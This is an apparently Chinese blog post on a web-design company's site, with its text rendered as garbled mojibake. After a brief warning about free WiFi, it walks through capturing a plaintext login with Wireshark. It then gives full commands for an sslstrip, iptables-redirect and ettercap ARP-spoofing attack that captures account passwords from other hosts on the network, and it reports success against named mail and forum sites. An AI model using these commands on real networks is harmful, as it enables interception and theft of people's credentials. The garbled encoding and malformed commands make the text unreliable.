因?qū)懥艘欢挝淖郑陀羞@個(gè)抓包實(shí)驗(yàn)
成都創(chuàng)新互聯(lián)自2013年創(chuàng)立以來(lái),是專業(yè)互聯(lián)網(wǎng)技術(shù)服務(wù)公司,擁有項(xiàng)目成都做網(wǎng)站、成都網(wǎng)站建設(shè)、成都外貿(mào)網(wǎng)站建設(shè)網(wǎng)站策劃,項(xiàng)目實(shí)施與項(xiàng)目整合能力。我們以讓每一個(gè)夢(mèng)想脫穎而出為使命,1280元英吉沙做網(wǎng)站,已為上家服務(wù),為英吉沙各地企業(yè)和個(gè)人服務(wù),聯(lián)系電話:18980820575
--------------------------------
話說(shuō):“現(xiàn)在我們一到某處,第一件事便是問(wèn)有沒(méi)有WiFi”。WiFi成為當(dāng)下的熱門,在公共場(chǎng)合人們最喜歡免費(fèi)WiFi。但用著用著后不覺QQ被盜了。這WiFi便是誘餌,釣魚人設(shè)了一個(gè)局,我們以為撿到便宜了,須不知,我們上勾了。QQ被盜,郵箱被瀏覽等等。免費(fèi)雖好,請(qǐng)謹(jǐn)慎。
---------------------------------------
1.利用wireshark抓包測(cè)試51cto帳戶及密碼
環(huán)境的搭建
網(wǎng)絡(luò)環(huán)境:網(wǎng)關(guān):192.168.199.1;
測(cè)試主機(jī):192.168.199.101,ubuntu13.04/wireshark;
測(cè)試目標(biāo):51cto.com
步驟
a.ubuntu 13.04安裝wireshark
sudo apt-get wireshark
b. 新建wireshark組把普通用戶加入其中,給wireshark使用權(quán)限
sudo groupadd wireshark //加組wireshark
sudo gpasswd -a zozlin wireshark //向組 GROUP 中添加用戶 USER
sudo chgrp wireshark /usr/bin/dumpcap // 更抓包文件改組
sudo chmod 4755 /usr/bin/dumpcap //可執(zhí)行權(quán)限
錯(cuò)誤:
解決方法:sudo gedit /usr/share/wireshark/init.lua
倒數(shù)第二行原來(lái)為:dofile(DATA_DIR.."console.lua")改為--dofile(DATA_DIR.."console.lua")
c. sudo wireshark 選擇網(wǎng)卡(在本機(jī)測(cè)試)
定過(guò)濾規(guī)則
ip.src==192.168.199.100 && http (源地址及http協(xié)議)
重點(diǎn) (post application/x-www-form-urllencoded)
先試試天涯論壇和163郵件的密碼,ssl己加密傳輸了。后51cto 發(fā)現(xiàn)是明文帳號(hào)密碼
-----------------------------------------
2.利用sslstrip和ettercap突破ssl嗅探密碼
環(huán)境的搭建
網(wǎng)絡(luò)環(huán)境:網(wǎng)關(guān):192.168.199.1;
***主機(jī):192.168.199.101,ubuntu13.04/wireshark/sslstrip;
被***主機(jī):192.168.199.105/103,虛擬機(jī)Windowsxp,IE6;
測(cè)試目標(biāo):51cto.com mail.163.com tianya.cn baidu.com
步驟
下載
http://www.thoughtcrime.org/software/sslstrip/
解壓
tar -zxvf sslstrip-0.9.tar.gz
安裝
sslstrip python setup.py install
打開ip_forword轉(zhuǎn)發(fā)
echo “1”>/proc/sys/net/ipv4/ip_forward
使用Iptables過(guò)濾數(shù)據(jù)包 //通過(guò)iptables 把所有http數(shù)據(jù)導(dǎo)入到10000端口,我們用sslstrip監(jiān)聽10000端口,并得到我們想要的數(shù)據(jù)
iptables -t nat -A PREROUTING -p tcp –destination-port 80 -j REDIRECT –to-port 10000
sslstrip -l 10000
利用ettercap進(jìn)行arp欺騙
ettercap –T –q –M arp:remote /192.168.199.103/ /192.168.199.1/
成果
mail.163.com 51cto.com 破
baidu.com 密碼再次加密了
tianya.cn 未破
參考1.http://www.freebuf.com/articles/web/5929.html
2.http://www.blogjava.net/heyang/archive/2011/04/05/340330.html
3.http://www.linuxde.net/2011/11/2522.html
標(biāo)題名稱:免費(fèi)WiFi,wireshark抓包及sslstrip抓密碼
本文地址:http://www.chinadenli.net/article12/pejegc.html
成都網(wǎng)站建設(shè)公司_創(chuàng)新互聯(lián),為您提供用戶體驗(yàn)、網(wǎng)站收錄、微信公眾號(hào)、網(wǎng)站策劃、企業(yè)建站、網(wǎng)站營(yíng)銷
聲明:本網(wǎng)站發(fā)布的內(nèi)容(圖片、視頻和文字)以用戶投稿、用戶轉(zhuǎn)載內(nèi)容為主,如果涉及侵權(quán)請(qǐng)盡快告知,我們將會(huì)在第一時(shí)間刪除。文章觀點(diǎn)不代表本網(wǎng)站立場(chǎng),如需處理請(qǐng)聯(lián)系客服。電話:028-86922220;郵箱:631063699@qq.com。內(nèi)容未經(jīng)允許不得轉(zhuǎn)載,或轉(zhuǎn)載時(shí)需注明來(lái)源: 創(chuàng)新互聯(lián)